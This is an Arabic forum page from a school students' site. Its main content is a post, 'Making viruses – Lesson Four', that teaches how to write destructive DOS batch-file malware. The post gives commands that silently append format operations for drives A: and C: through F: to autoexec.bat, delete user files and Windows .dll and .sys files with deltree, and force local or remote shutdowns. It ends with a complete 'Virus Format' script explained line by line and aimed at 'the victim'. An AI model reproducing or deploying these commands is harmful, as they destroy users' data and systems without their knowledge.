أهلا بزوارنا الأكارم في موقع طلاب ثانوية الفارابي

نرجو أن تساهموا بإغناء منتدانا بمشاركاتكم وتعليقاتكم البناءة

شكرا لزيارتكم



























بحـث
 
 

نتائج البحث
 


Rechercher بحث متقدم

المواضيع الأخيرة
» كتاب علم الأحياء بصياغة مؤلفه الأستاذ علي المحمد
الجمعة أكتوبر 04, 2013 5:47 pm من طرف الأستاذ علي حسن المحمد

» فلاشات حول "ميكانيك السوائل"
الثلاثاء نوفمبر 06, 2012 4:21 pm من طرف عمار ابراهيم

» خاص بنظرية الطاقة الحركية
الأحد نوفمبر 04, 2012 4:22 am من طرف المدير العام للمنتدى

» خاص بميكانيك السوائل والحقل المغناطيسي
الإثنين أكتوبر 29, 2012 7:12 pm من طرف الأستاذ جمال ديب

» خاص بنواس الفتل
الجمعة أكتوبر 19, 2012 2:09 am من طرف الأستاذ جمال ديب

» كلمات أغنية حماك الله ياوطني مع التحميل
الثلاثاء أكتوبر 16, 2012 9:39 pm من طرف hani3571

» خاص بالنواس المرن
السبت أكتوبر 13, 2012 3:42 am من طرف الأستاذ جمال ديب

» خاص بنظرية التسارع الزاوي ونظرية العزوم
الجمعة أكتوبر 12, 2012 5:49 pm من طرف الأستاذ جمال ديب

» الأستاذ محمد نزار الهزاز في ذمة الله
الخميس أكتوبر 11, 2012 12:54 am من طرف المدير العام للمنتدى

سحابة الكلمات الدلالية

احصائيات
هذا المنتدى يتوفر على 972 عُضو.
آخر عُضو مُسجل هو خالد عبيدات فمرحباً به.

أعضاؤنا قدموا 7411 مساهمة في هذا المنتدى في 2291 موضوع
رجاء التزموا بغاية المنتدى

الأربعاء مارس 16, 2011 1:55 am من طرف نائب المدير العام

رجاء إلى جميع من يزور منتدانا العلمي ...أن يلتزم بالمواضيع العلمية والمختلفة وفقا للبوابات المتاحة
والابتعاد عن المقالات والاخبار الدينية والسياسية فكل منا لديه ما يكفي من الفضائيات والكتب والمبادئ.
وكما ذكر سابقا …

تعاليق: 0

شكر وترحيب

الإثنين سبتمبر 20, 2010 6:22 pm من طرف نائب المدير العام

باسمي وباسم كل الأعضاء في منتدى ثانوية الفارابي أرحب بالمدرسين الأكارم الذين شرفونا بالانضمام إلى هذا المنتدى .
َعلّ هذه الخطوة تحقق غاية من غايات المنتدى في تعزيز عملية التواصل بين المدرس وتلميذه وتطوير آلية التعليم .


تعاليق: 0

إلى جميع الأعضاء

السبت يونيو 19, 2010 9:43 pm من طرف نائب المدير العام

أريد أن أشكر جميع الأعضاء والزوار والمشرفين على جميع مساهماتهم التي أغنت المنتدى وساعدت على تطويره .

وأشكركم أيضا على التزامكم قواعد الأدب والاحترام واللباقة ضمن المنتدى .

أتمنى أن تستمروا بالتواصل معنا


نائب المدير العام

تعاليق: 0

المتواجدون الآن ؟
ككل هناك 1 عُضو حالياً في هذا المنتدى :: 0 عضو مُسجل, 0 عُضو مُختفي و 1 زائر

لا أحد

أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 27 بتاريخ الثلاثاء أغسطس 28, 2012 11:23 pm

صناعة الفيروسات - الدرس الرابع

اذهب الى الأسفل

صناعة الفيروسات - الدرس الرابع

مُساهمة من طرف bl@ck h@cker في الأحد مايو 02, 2010 8:04 pm

الدرس الرابع

للاحتراف بجد
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و شروحات لبعض منها ليس له علاقة في الدورة مثل طريقة التشفير و تغير الامتداد و الذكاء الفيروسي مع اني لم اعطي الا جزء منه ان هذا الدرس لا تحدث عن الذكاء الفيروسي لا كن نحن لا نستطيع صناعة فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في اللغات البرمجية و هذه التي ندرسها الان ليست لغة برمجية بتاتاً لاكنه احدى اهم مكونات نظم التشغيل الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في العالم عددهم ليس بالقليل هذه الفيروسات التي نصنعها لا تعمل الا اذ كان هناك على الحاسب نظام دوس السبب لانه قد اشرنا في الدرس الاول في قسم المقدمة في الجزء الاول ((تعريف)) انه الملفات الدفاعية هي ليست الا حزمة من اوامر نظام التشغيل الدوس ...

1- الاكود الاكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس

كود PHP:
call attrib -h -r c:autoexec.bat >nul

------------------------------------
2.هذا الكود للفورمات

كود PHP:
echo format a: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
3.هذا كود للفورمات لكن بالختصار
echo & /autotest >nul >>c:\autoexec.bat ألاولى تعنى انسخ الامر القادم الى
(طبعاً معروف من الكود الاول انة الى الاوتوا**ك)
الثانية تعنى اجراء وتنفيذ الامر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لابد ان يحذرك الاول ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية اذن هذا الكود هو المسؤول عن هذا ويعني أيضا ان النسخ يكون الى ملف الاوتوا**يك في السي
------------------------------------
4.هذا كود فورمات كل الاقراص |385|

كود PHP:
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat

------------------------------------
5.هذا كود فيروس العد التنازلي و علاجه :
الكود:
echo off@
shutdown -s اذا فتحت الفايروس راح يعد تنازلي من 30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه رسالة وتوقيت غير
كود:
echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
echo off@
shutdown -s -t 15 -c "message" -m \\namecomputer طبعا نغير 15 الى عدد الثوان و message الى الرسالة ونغير namecomputer إلى الجهاز المراد اغلاقه
العلاج :
shutdown –a
2-مجموعة من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لاكن مع شرح مفصل جداً
1 - اذ اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عند الضحية ويقوم بالغاء ملف تكست |391| اسمة مثلاً ا**
ملاحظة : يمكنك وضع أي كود dos غير الفورمات على هذة القاعدة

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسي >nul >>c:autoexec.bat

والسطر الاخير يكرر إن كنت تريد اما اذا كانت العملية تتطلب إلغاء رسالة تحذيرية فتكون القاعدة

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat

مع تكرار السطر الاخير أن تتطلب ويمكنك وضع قاعدة مشتركة

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo كود دوسى /autotest >nul >>c:autoexec.bat
echo كود دوسى >nul >>c:autoexec.bat

يعني نفكر هيك انو كان الكود رح تعترض رسالة فى احد السطور فلابد من اضافة /autotest لتفادي الرسالة التحذيرية
------------------------------------
2 - اذ اردت كتابة كود فايروسي يعمل التالي
يدخل على قرص الذي عند الضحية ويقوم بالغاء ملف تكست اسمة مثلاً ا** هل هذه الفكرة تعترضها رسالة تحذيرية
بالطبع لا إذن اتبع القاعدة الاولى يكون الكود كما يلي
كود PHP:
ي
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat

التحليل
-------

كود PHP:
call attrib -h -r c:autoexec.bat >nul

ذكرنا منذ قليل الان لدخول الدريف والغاء ملف اسمة اكس(ت**ت مثلاً) فى الدوس كنت باتكتب
c:/ press enter فيتحول المحث |373| الى d:/ للاغاء رح تكتب
d:/Del x.txt press enter اذن معنا الكود الدوسى وقد قمنا بالعملية على كام خطوة على خطوتين اذن معنا الكود وعدد الخطوات ومعنا الكود الاساسى للفيروس نستنتج التالي عدد سطر الكود لابد ان يكون
اثنين + واحد (اساسي) + اي عدد لوبدك تكمل الفيرس لشىء تاني فيكون

كود PHP:
call attrib -h -r c:autoexec.bat >nul

(اساسي)

كود PHP:
echo d: >nul >>c:autoexec.bat

(الدخول على الدريف دي)

كود PHP:
echo Del x.txt >nul >>c:autoexec.bat

(الغاء ملف امسة اكس ت**ت)
تذكر :::::

كود PHP:
echo كود الدوس >nul >>c:autoexec.bat

------------------------------------
3 - اذ اردت الغاء كل الملفات التي امتدادها .txt في القرص

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat

------------------------------------
4 - اذ اردت الغاء كل الملفات التي امتدادها .zipفي القرص

كود PHP:
call attrib -h -r c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat

------------------------------------
5 - كود يقوم بالغاء ملفات النظام |300| و تحليله :

كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

تحليلة :
c: دخلنا على السي

كود PHP:
cd %WinDir%System

دخلنا على ملف السيستم فى الوندوز

كود PHP:
deltree /y *.dll

الغاء كل ملفات الامتداد DLL. والتي هي خاص بالوندوز
cd\ خرجنا بعد تنفيذ العملية الاولى

كود PHP:
deltree /y *.sys

و الغاء كل ملفات sys. فى الوندوز.
هذا الكود كامل ما عدا كود التاريخ و انت تعرف انه لا استطيع صنع فيروس يعتمد على التاريخ عن طريق الملفات الدفاعية يعمل هذا الكود على ايقاف المضادات و فورمات C,D,E,F فقط و اذ اردت يمكنك الاضافة , و كود اعادة التشغيل اعتقد انه انت قرأت الدرس الثاني و الاول ...
كود:

كود PHP:
@Echo Virus Format
@Echo www.3asfh.comvb
@Echo By RBG-7
call attrib -h -r c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown -s
End

اتمنى انو يكون واضح ..


كود PHP:
call attrib -h -r c:autoexec.bat >nul

Call : للاتصال في ملف من نوع Bat
Attrib : هذا امر خاص بالدوس يعمل على تغير خصائص ملف
-h : اخفاء
-r : جعله فقط قراءة
c:\autoexec.bat : الملف المراد التنفيذ عليه
> nul : هذا الامر مشروح في الدرس الاول و يعمل على عدم سؤال المستخدم


كود PHP:
format a: /q /u /autotest >nul >>c:autoexec.bat

Format : أمر الفورمات
a: الامر يطبق على القرص A
/q : سريع
/u : يقوم بحذف الملفات الاساسية
/autotest : هذا الأمر مهم جدا يقوم بنقل الكود المكتوب الى الملف المطلوب>nul >> : نقل من دون سؤال
c:\autoexec.bat : الملف الذي سوف يطبق به الكود


echo off@
shutdown -s -t 30 -c "message" طبعا نغير 30 الى عدد الثوان و message الى الرسالة
اغلاق الجهاز على الشبكة
@echo off : عدم استخدام الأمر Echo
اخوي البعض يسأل لماذا وضع هذا الامر في بعض الاحيان يخطئ المبرمج و يكتب الامر و بعده الكود مما يأدي الى القراءة فقط دون تنفيذ
shutdown -s : اطفاء الحاسب
-t : الوقت
30 : ثانية
-c : اظهار رسالة
message : اكتب الرسالة التي تريد


كود PHP:
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys

نعم اخوي هذا كود كامل لفيروس تدمير النظام لا ينكتب في سطر واحد و السبب لانه كود كامل و ليس امر
انتهى الدرس ...................................

مع تحيات أخوكم bl@ck h@cker



avatar
bl@ck h@cker
عضو لامع
عضو لامع

عدد المساهمات : 59
نقاط : 3145
السٌّمعَة : 10
تاريخ التسجيل : 15/04/2010

http://www.vbhackers.net

الرجوع الى أعلى الصفحة اذهب الى الأسفل

الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى